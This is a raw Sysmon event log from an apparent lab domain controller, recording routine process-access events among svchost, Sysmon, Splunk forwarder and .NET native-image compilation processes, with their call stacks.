13:48:44.872{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91BC-6005-0903-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91BC-6005-0803-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91BC-6005-0803-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91BC-6005-0803-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.732{59A5CD1D-91BC-6005-0803-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.341{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91BC-6005-0703-00000000A301}3392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.341{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91BC-6005-0703-00000000A301}3392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.341{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91BC-6005-0703-00000000A301}3392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:44.247{59A5CD1D-91BB-6005-0603-00000000A301}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d84-0\System.Drawing.dll2021-01-18 13:48:44.247 10341000x80000000000000007276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.559{59A5CD1D-91BD-6005-0A03-00000000A301}44483896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91BD-6005-0A03-00000000A301}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 